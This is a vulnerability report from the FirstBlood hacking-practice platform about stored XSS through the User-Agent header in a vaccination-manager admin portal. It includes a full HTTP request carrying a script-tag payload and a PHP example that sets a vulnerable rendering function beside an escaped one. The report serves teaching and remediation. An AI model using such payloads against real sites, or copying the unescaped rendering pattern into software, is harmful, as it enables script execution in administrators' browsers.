FirstBlood-#794 Stored XSS via User-Agent header value in /vaccination-manager/portal.php
This issue was discovered on FirstBlood v2



On 2021-10-28, panya Level 7 reported:

The vaccination manager admin portal unsafely reflects a User-Agent header's value (saved to the DB when a user sends vaccination proof via the /vaccination-manager/pub/submit-vaccination-proof.php endpoint), which leads to Stored XSS.

Example request:

POST /vaccination-manager/pub/submit-vaccination-proof.php HTTP/1.1
Host: 13f5cfe96d8e-panya.a.firstbloodhackers.com
Content-Length: 66604
Cache-Control: max-age=0
Sec-Ch-Ua: "Chromium";v="95", ";Not A Brand";v="99"
Sec-Ch-Ua-Mobile: ?0
Sec-Ch-Ua-Platform: "macOS"
Upgrade-Insecure-Requests: 1
Origin: https://13f5cfe96d8e-panya.a.firstbloodhackers.com
Content-Type: multipart/form-data; boundary=----WebKitFormBoundary6Ttb4gutNkKWWkV6
User-Agent: <script>alert(origin)</script>
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Sec-Fetch-Site: same-origin
Sec-Fetch-Mode: navigate
Sec-Fetch-User: ?1
Sec-Fetch-Dest: document
Referer: https://13f5cfe96d8e-panya.a.firstbloodhackers.com/vaccination-manager/pub/upload-vaccination-proof.php
Accept-Encoding: gzip, deflate
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
Connection: close

------WebKitFormBoundary6Ttb4gutNkKWWkV6
Content-Disposition: form-data; name="email"

[email protected]
------WebKitFormBoundary6Ttb4gutNkKWWkV6
Content-Disposition: form-data; name="vaccination_proof"; filename="pepe.png"
Content-Type: image/png

‰PNG


IHDR  D  
<skipped>
------WebKitFormBoundary6Ttb4gutNkKWWkV6--

Notice that I changed the User-Agent header value to <script>alert(origin)</script>.

The script tag is reflected in the vaccination-manager's admin portal and triggers an alert with the text "https://13f5cfe96d8e-panya.a.firstbloodhackers.com".

Impact:

An attacker could execute JS code on behalf of a vaccination-manager admin.

Mitigation:

The User-Agent header's value should be properly escaped or sanitized.

P2 High

Endpoint: /vaccination-manager/portal.php

Parameter: User-Agent

Payload: <script>alert(origin)</script>


FirstBlood ID: 29
Vulnerability Type: Stored XSS

When uploading a vaccine proof it is possible to achieve stored XSS against admins via the User-Agent header. As this value typically can't be user-controlled, the developers did not think it was 'worth' protecting against XSS.
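The mitigation in the report (escape or sanitize the stored User-Agent before rendering it) and the root cause in the summary above (a header that was assumed not to be user-controlled) are illustrated by the following added example. It is not FirstBlood's code: the function names, the row layout and the sample rows are assumptions standing in for what portal.php would read back from the database after a submission like the one in the report.

```php
<?php
// Added example, not code from the FirstBlood application.
// Shows the stored-XSS pattern from the report and a hardened version.
// Function names, column names and the $rows sample are assumptions.

// Constructed sample rows: what submit-vaccination-proof.php would have
// persisted for the report's request and for an ordinary browser.
$rows = [
    ['email' => 'attacker@example.test', 'user_agent' => '<script>alert(origin)</script>'],
    ['email' => 'patient@example.test',  'user_agent' => 'Mozilla/5.0 (Macintosh; Intel Mac OS X) AppleWebKit/537.36'],
];

// Write side. The header is attacker-controlled exactly like a form field:
// any HTTP client can set it. Capturing it is fine, but trim control
// characters and cap the length as defence in depth. This does not replace
// output encoding; it only limits what reaches the database.
function normalize_user_agent(?string $ua): string
{
    $ua = preg_replace('/[\x00-\x1F\x7F]/', '', $ua ?? '');
    return mb_substr($ua, 0, 512);
}

function capture_user_agent(): string
{
    return normalize_user_agent($_SERVER['HTTP_USER_AGENT'] ?? null);
}

// Read side, vulnerable pattern: the stored value is concatenated straight
// into admin-portal markup, so a <script> payload executes in the admin's
// browser when the portal is opened.
function render_row_vulnerable(array $row): string
{
    return '<tr><td>' . $row['email'] . '</td><td>' . $row['user_agent'] . '</td></tr>';
}

// Read side, hardened pattern: contextual output encoding for an HTML text
// node. ENT_QUOTES covers both quote styles, ENT_SUBSTITUTE avoids returning
// an empty string on invalid UTF-8, and the charset is set explicitly.
function esc(string $value): string
{
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

function render_row_safe(array $row): string
{
    return '<tr><td>' . esc($row['email']) . '</td><td>' . esc($row['user_agent']) . '</td></tr>';
}

// Side-by-side rendering of the constructed rows.
foreach ($rows as $row) {
    echo 'vulnerable: ' . render_row_vulnerable($row) . PHP_EOL;
    echo 'safe:       ' . render_row_safe($row) . PHP_EOL;
}
```

Run it with the PHP CLI (php example.php) to see the first row rendered once as a live script element and once as inert entity-encoded text. The encoding belongs at the point where the value is written into HTML, not only at capture time, because the same stored string may later be emitted into other contexts (a JavaScript string, an attribute, JSON) that each need their own encoding. Adding a Content-Security-Policy to the admin portal would further limit what an injected script could do, but it is a second layer, not a substitute for escaping.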